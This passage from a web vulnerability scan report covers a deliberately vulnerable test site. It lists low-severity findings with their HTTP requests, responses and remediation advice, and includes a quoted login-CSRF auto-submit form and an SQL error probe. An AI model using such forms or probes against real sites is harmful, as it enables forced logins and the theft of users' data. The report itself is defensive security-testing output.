  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>

</head>
<body> 
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead"> 
  <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1>   
  <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>
  <div id="globalNav"> 
      	<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>
	<td align="left">
		<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists
		</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | 
		<a href="guestbo
…

History

Message	Owner	Date
The Issue was detected during the Scan.	System	12/24/2021 7:16:28 AM
The Issue was detected during the Scan.	System	9/28/2021 7:26:29 AM
The Issue was detected during the Scan.	System	8/29/2021 9:00:39 AM
The Issue was detected during the Scan.	System	8/27/2021 8:48:27 AM
The Issue was detected during the Scan.	System	6/9/2021 1:19:34 PM
The Issue was detected during the Scan.	System	6/9/2021 1:13:40 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:05:06 AM

Show Remediation Hide Remediation

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.

CLASSIFICATION

OWASP Top Ten 2021

A05

16. Database Error Message Disclosure

LOW

Acunetix 360 identified a database error message disclosure.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL injection vulnerability. Most of the time Acunetix 360 will detect and report that problem separately.

Vulnerabilities

16.1. http://testphp.vulnweb.com/listproducts.php?cat=%2527

Method	Parameter	Value
GET	cat	%27

Page Type

Other

Certainty

Request Response Go to the highlighted output

Request

GET /listproducts.php?cat=%2527 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/categories.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 183.1864

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:51:24 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>pictures</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>

</head>
<body> 
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead"> 
  <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1>   
  <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>
  <div id="globalNav"> 
      	<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>
	<td align="left">
		<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists
		</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | 
		<a href="guestbook.php">guestbook</a> | 
		<a href="A
…

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:28:21 AM
The Issue was detected during the Scan.	System	8/29/2021 9:05:06 AM
The Issue was detected during the Scan.	System	8/27/2021 8:51:24 AM
The Issue was detected during the Scan.	System	6/9/2021 1:23:50 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:09:12 AM

Show Remediation Hide Remediation

Remedy

Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.

CLASSIFICATION

OWASP Top Ten 2021

A05

17. [Possible] Cross-site Request Forgery

LOW

Acunetix 360 identified a possible Cross-Site Request Forgery.

CSRF is a very common vulnerability. It's an attack which forces a user to execute unwanted actions on a web application in which the user is currently authenticated.

Impact

Depending on the application, an attacker can mount any of the actions that can be done by the user such as adding a user, modifying content, deleting data. All the functionality that’s available to the victim can be used by the attacker. Only exception to this rule is a page that requires extra information that only the legitimate user can know (such as user’s password).

Vulnerabilities

17.1. http://testphp.vulnweb.com/guestbook.php

Form Name(s)

faddentry

Page Type

Other

Certainty

Request Response Go to the highlighted output

Request

GET /guestbook.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 195.8695

Total Bytes Received : 228

Body Length : 0

Is Compressed : No


…
ackground-color:#F5F5F5">08.27.2021, 8:48 am</td></tr><tr><td colspan="2"><img src="/images/remark.gif">&nbsp;&nbsp;</td></tr></table>	 </div>
	  <div class="story">
	  	<form action="" method="post" name="faddentry">
			<input type="hidden" name="name" value="anonymous user">
			<textarea name="text" rows="5" wrap="VIRTUAL" style="width:500px;"></textarea>
			<br>
			<input type="submit" name="submit" value="add
…

History

Message	Owner	Date
The Issue was detected during the Scan.	System	12/24/2021 7:16:37 AM
The Issue was detected during the Scan.	System	9/28/2021 7:26:49 AM
The Issue was detected during the Scan.	System	8/29/2021 9:00:50 AM
The Issue was detected during the Scan.	System	8/27/2021 8:48:42 AM
The Issue was detected during the Scan.	System	6/9/2021 1:19:47 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:05:18 AM

Show Remediation Hide Remediation

Remedy

Send additional information in each HTTP request that can be used to determine whether the request came from an authorized source. This "validation token" should be hard to guess for attacker who does not already have access to the user's account. If a request is missing a validation token or the token does not match the expected value, the server should reject the request.
If you are posting form in ajax request, custom HTTP headers can be used to prevent CSRF because the browser prevents sites from sending custom HTTP headers to another site but allows sites to send custom HTTP headers to themselves using XMLHttpRequest.
- For native XMLHttpRequest (XHR) object in JavaScript;
```
xhr = new XMLHttpRequest();
xhr.setRequestHeader('custom-header', 'valueNULL');
```
  For JQuery, if you want to add a custom header (or set of headers) to
  a. individual request
```
$.ajax({
    url: 'foo/bar',
    headers: { 'x-my-custom-header': 'some value' }
});
```
  b. every request
```
$.ajaxSetup({
    headers: { 'x-my-custom-header': 'some value' }
});
OR
$.ajaxSetup({
    beforeSend: function(xhr) {
        xhr.setRequestHeader('x-my-custom-header', 'some value');
    }
});
```

External References

OWASP Cross-Site Request Forgery (CSRF)

Remedy References

OWASP Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet

CLASSIFICATION

OWASP Top Ten 2021

A01

18. [Possible] Cross-site Request Forgery in Login Form

LOW

Acunetix 360 identified a possible Cross-Site Request Forgery in Login Form.

In a login CSRF attack, the attacker forges a login request to an honest site using the attacker’s user name and password at that site. If the forgery succeeds, the honest server responds with a Set-Cookie header that instructs the browser to mutate its state by storing a session cookie, logging the user into the honest site as the attacker. This session cookie is used to bind subsequent requests to the user’s session and hence to the attacker’s authentication credentials. The attacker can later log into the site with his legitimate credentials and view private information like activity history that has been saved in the account.

Impact

In this particular case CSRF affects the login form in which the impact of this vulnerability is decreased significantly. Unlike normal CSRF vulnerabilities this will only allow an attacker to exploit some complex XSS vulnerabilities otherwise it can't be exploited.

For example;

If there is a page that's different for every user (such as "edit my profile") and vulnerable to XSS (Cross-site Scripting) then normally it cannot be exploited. However if the login form is vulnerable, an attacker can prepare a special profile, force victim to login as that user which will trigger the XSS exploit. Again attacker is still quite limited with this XSS as there is no active session. However the attacker can leverage this XSS in many ways such as showing the same login form again but this time capturing and sending the entered username/password to the attacker.

In this kind of attack, attacker will send a link containing html as simple as the following in which attacker's user name and password is attached.

<form method="POST" action="http://honest.site/login">
  <input type="text" name="user" value="h4ck3r" />
  <input type="password" name="pass" value="passw0rd" />
</form>
<script>
    document.forms[0].submit();
</script>

When the victim clicks the link then form will be submitted automatically to the honest site and exploitation is successful, victim will be logged in as the attacker and consequences will depend on the website behavior.

Search History

Many sites allow their users to opt-in to saving their search history and provide an interface for a user to review his or her personal search history. Search queries contain sensitive details about the user’s interests and activities and could be used by the attacker to embarrass the user, to steal the user’s identity, or to spy on the user. Since the victim logs in as the attacker, the victim's search queries are then stored in the attacker’s search history, and the attacker can retrieve the queries by logging into his or her own account.
Shopping

Merchant sites might save the credit card details in user's profile. In login CSRF attack, when user funds a purchase and enrolls the credit card, the credit card details might be added to the attacker's account.

Vulnerabilities

18.1. http://testphp.vulnweb.com/login.php

Form Name(s)

loginform

Page Type

Certainty

Request Response Go to the highlighted output

Request

GET /login.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 2060.161

Total Bytes Received : 228

Body Length : 0

Is Compressed : No


…
ntent -->
<!-- InstanceBeginEditable name="content_rgn" -->
<div id="content">
	<div class="story">
	<h3>If you are already registered please enter your login information below:</h3><br>
	<form name="loginform" method="post" action="userinfo.php">
	<table cellpadding="4" cellspacing="1">
		<tr><td>Username : </td><td><input name="uname" type="text" size="20" style="width:120px;"></td></tr>
		<tr><td>Passwo
…

History

Message	Owner	Date
The Issue was detected during the Scan.	System	12/24/2021 7:16:43 AM
The Issue was detected during the Scan.	System	9/28/2021 7:26:45 AM
The Issue was detected during the Scan.	System	8/29/2021 9:00:52 AM
The Issue was detected during the Scan.	System	8/27/2021 8:48:27 AM
The Issue was detected during the Scan.	System	6/9/2021 1:19:34 PM
The Issue was detected during the Scan. The State was set to Present	System	6/9/2021 1:13:41 PM

Show Remediation Hide Remediation

Remedy

Send additional information in each HTTP request that can be used to determine whether the request came from an authorized source. This "validation token" should be hard to guess for attacker who does not already have access to the user's account. If a request is missing a validation token or the token does not match the expected value, the server should reject the request.
If you are posting form in ajax request, custom HTTP headers can be used to prevent CSRF because the browser prevents sites from sending custom HTTP headers to another site but allows sites to send custom HTTP headers to themselves using XMLHttpRequest.
- For native XMLHttpRequest (XHR) object in JavaScript;
```
xhr = new XMLHttpRequest();
xhr.setRequestHeader('custom-header', 'valueNULL);
```
  For JQuery, if you want to add a custom header (or set of headers) to
  a. individual request
```
$.ajax({
    url: 'foo/bar',
    headers: { 'x-my-custom-header': 'some value' }
});
```
  b. every request
```
$.ajaxSetup({
    headers: { 'x-my-custom-header': 'some value' }
});
OR
$.ajaxSetup({
    beforeSend: function(xhr) {
        xhr.setRequestHeader('x-my-custom-header', 'some value');
    }
});
```

External References

Remedy References

OWASP Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet

CLASSIFICATION

OWASP Top Ten 2021

A01

19. Missing X-Frame-Options Header

LOW

Acunetix 360 detected a missing X-Frame-Options header which means that this website could be at risk of a clickjacking attack.

The X-Frame-Options HTTP header field indicates a policy that specifies whether the browser should render the transmitted resource within a frame or an iframe. Servers can declare this policy in the header of their HTTP responses to prevent clickjacking attacks, which ensures that their content is not embedded into other pages or frames.

Impact

Clickjacking is when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on a framed page when they were intending to click on the top level page. Thus, the attacker is "hijacking" clicks meant for their page and routing them to other another page, most likely owned by another application, domain, or both.

Using a similar technique, keystrokes can also be hijacked. With a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they are typing in the password to their email or bank account, but are instead typing into an invisible frame controlled by the attacker.

Vulnerabilities

19.1. http://testphp.vulnweb.com/login.php

Page Type

Certainty

Request Response Go to the highlighted output

Request

GET /login.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 2060.161

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:48:22 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>login page</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<!-- here goes headers headers -->
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>

</head>
<body> 
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead"> 
  <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1>   
  <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>
  <div id="globalNav"> 
      	<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>
	<td align="left">
		<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists
		</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | 
		<a href="guestbo
…

History

Message	Owner	Date
The Issue was detected during the Scan.	System	12/24/2021 7:16:29 AM
The Issue was detected during the Scan.	System	9/28/2021 7:26:29 AM
The Issue was detected during the Scan.	System	8/29/2021 9:00:40 AM
The Issue was detected during the Scan.	System	8/27/2021 8:48:28 AM
The Issue was detected during the Scan.	System	6/9/2021 1:19:34 PM
The Issue was detected during the Scan.	System	6/9/2021 1:13:41 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:05:07 AM

Show Remediation Hide Remediation

Remedy

Sending the proper X-Frame-Options in HTTP response headers that instruct the browser to not allow framing from other domains.
- X-Frame-Options: DENY It completely denies to be loaded in frame/iframe.
- X-Frame-Options: SAMEORIGIN It allows only if the site which wants to load has a same origin.
- X-Frame-Options: ALLOW-FROM URL It grants a specific URL to load itself in a iframe. However please pay attention to that, not all browsers support this.
Employing defensive code in the UI to ensure that the current frame is the most top level window.

External References

Remedy References

Clickjacking Defense Cheat Sheet

CLASSIFICATION

OWASP Top Ten 2021

A05

20. [Possible] Insecure Reflected Content

LOW

Acunetix 360 detected that the target web application reflected a piece of content starting from the first byte of the response. This might cause security issues such as Rosetta Stone Attack.

Impact

An attacker might bypass same origin policy and use website to his or her advantage. Rosetta Flash is a known vulnerability which uses this technique making a victim perform arbitrary requests to the domain with the vulnerable endpoint and exfiltrate potentially sensitive data.

Vulnerabilities

20.1. http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=&p=N3tSp4rK3R&pp=12

Method	Parameter	Value
GET	p	N3tSp4rK3R
GET	pp	12
GET	aaaa%2f

Certainty

Request Response Go to the highlighted output

Request

GET /hpp/params.php?aaaa%2f=&p=N3tSp4rK3R&pp=12 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/hpp/?pp=12
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 183.3842

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:58:34 GMT

N3tSp4rK3R12

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:35:19 AM
The Issue was detected during the Scan.	System	8/29/2021 9:17:40 AM
The Issue was detected during the Scan.	System	8/27/2021 8:58:34 AM
The Issue was detected during the Scan.	System	6/9/2021 1:30:14 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:21:17 AM

Show Remediation Hide Remediation

Actions to Take

Action might vary depending on the use of this page. This is reported just for your attention. If you concern about security and this page is used to provide data via JSONP callback function, Content-Disposition header with filename attribute can be returned to mitigate a possible attack:

Content-Disposition: attachment; filename=f.txt

External References

Abusing JSONP with Rosetta Flash

CLASSIFICATION

OWASP Top Ten 2021

A03

21. [Possible] Phishing by Navigating Browser Tabs

LOW

Acunetix 360 identified possible phishing by navigating browser tabs but was unable to confirm the vulnerability.

Open windows with normal hrefs with the tag target="_blank" can modify window.opener.location and replace the parent webpage with something else, even on a different origin.

Impact

While this vulnerability doesn't allow script execution, it does allow phishing attacks that silently replace the parent tab. If the links lack rel="noopener noreferrer" attribute, a third party site can change the URL of the source tab using window.opener.location.assign and trick the users into thinking that they’re still in a trusted page and lead them to enter their sensitive data on the malicious website.

Vulnerabilities

21.1. http://testphp.vulnweb.com/disclaimer.php

External Links

http://www.eclectasy.com/Fractal-Explorer/index.html

Page Type

Other

Certainty

Request Response Go to the highlighted output

Request

GET /disclaimer.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 197.8755

Total Bytes Received : 228

Body Length : 0

Is Compressed : No


…
ddress, nor e-mail or
		website addresses.</p>
		<p>Information you post on this site are by no means private nor protected!</p>
		<p>All images on this site were generated with fre software <a href="http://www.eclectasy.com/Fractal-Explorer/index.html" target="_blank">
		<strong>Fractal Explorer</strong></a>.</p>
	  </div>
</div>
<!-- InstanceEndEditable -->
<!--end content -->

<div id="navBar"> 
  <div id="search"> 
    <form action="search.php?
…
r/php-security-scanner/">PHP scanner</a></li>
	  <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li>
	  <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> 
    </ul> 
  </div> 
  <div id="advert"> 
    <p>
      <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave
…

History

Message	Owner	Date
The Issue was detected during the Scan.	System	12/24/2021 7:16:39 AM
The Issue was detected during the Scan.	System	9/28/2021 7:26:49 AM
The Issue was detected during the Scan.	System	8/29/2021 9:00:48 AM
The Issue was detected during the Scan.	System	8/27/2021 8:48:41 AM
The Issue was detected during the Scan.	System	6/9/2021 1:19:44 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:05:18 AM

Show Remediation Hide Remediation

Remedy

Add rel=noopener to the links to prevent pages from abusing window.opener. This ensures that the page cannot access the window.opener property in Chrome and Opera browsers.
For older browsers and in Firefox, you can add rel=noreferrer which additionally disables the Referer header.

<a href="..." target="_blank" rel="noopener noreferrer">...</a>

External References

CLASSIFICATION

OWASP Top Ten 2021

A05

Enabled Security Checks	:	Arbitrary Files (IAST), BREACH Attack, Code Evaluation, Code Evaluation (IAST), Code Evaluation (Out of Band), Command Injection, Command Injection (Blind), Command Injection (IAST), Configuration Analyzer (IAST), Content Security Policy, Content-Type Sniffing, Cookie, Cross Frame Options Security, Cross-Origin Resource Sharing (CORS), Cross-Site Request Forgery, Cross-site Scripting, Cross-site Scripting (Blind), Drupal Remote Code Execution, Expect Certificate Transparency (Expect-CT), File Upload, Header Analyzer, Heartbleed, HSTS, HTML Content, HTTP Header Injection, HTTP Header Injection (IAST), HTTP Methods, HTTP Status, IFrame Security, Insecure JSONP Endpoint, Insecure Reflected Content, JavaScript Libraries, JSON Web Token, Local File Inclusion, Local File Inclusion (IAST), Login Page Identifier, Malware Analyzer, Mixed Content, Open Redirection, Referrer Policy, Reflected File Download, Remote File Inclusion, Remote File Inclusion (Out of Band), Reverse Proxy Detection, Server-Side Request Forgery (DNS), Server-Side Request Forgery (Pattern Based), Server-Side Template Injection, Signatures, SQL Injection (Blind), SQL Injection (Boolean), SQL Injection (Error Based), SQL Injection (IAST), SSL, Static Resources (All Paths), Unicode Transformation (Best-Fit Mapping), WAF Identifier, Web App Fingerprint, Web Cache Deception, XML External Entity, XML External Entity (Out of Band)
URL Rewrite Mode	:	Heuristic
Detected URL Rewrite Rule(s)	:	None
Excluded URL Patterns	:	gtm\.js WebResource\.axd ScriptResource\.axd
Authentication	:	None
Authentication Profile	:
Scheduled	:	No
Additional Website(s)	:	None
Scan Profile	:	NoAuth
Scan Policy	:	OptimizedScanPolicy
Report Policy	:	Default Report Policy
Scope	:	Entered Path and Below
Scan Type	:	Full
Max Scan Duration	:	48 hour(s)

Vulnerabilities By OWASP Top Ten 2021

1. [Probable] SQL Injection

Impact

Vulnerabilities

Certainty

Request

Response

History

Certainty

Request

Response

History

Certainty

Request

Response

History

Actions to Take

Remedy

Required Skills for Successful Exploitation

External References

Remedy References

CLASSIFICATION

CVSS 3.0 SCORE

CVSS Vector String

CVSS 3.1 SCORE

CVSS Vector String

2. Boolean Based SQL Injection

Impact

Vulnerabilities

Proof of Exploit

Identified Database Name (cached)

Identified Database User (cached)

Identified Database Version (cached)

Request

Response

History

Proof of Exploit

Identified Database Name (cached)

Identified Database User (cached)

Identified Database Version (cached)

Request

Response

History

Proof of Exploit

Identified Database Name (cached)

Identified Database User (cached)

Identified Database Version (cached)

Request

Response

History

Proof of Exploit

Identified Database Name (cached)

Identified Database User (cached)

Identified Database Version (cached)

Request

Response

History

Proof of Exploit

Identified Database Name (cached)

Identified Database User (cached)

Identified Database Version (cached)

Request

Response

History

Proof of Exploit

Identified Database Name (cached)

Identified Database User (cached)

Identified Database Version (cached)

Request

Response

History

Proof of Exploit

Identified Database Name (cached)

Identified Database User (cached)

Identified Database Version (cached)

Request

Response

History

Proof of Exploit

Identified Database Name (cached)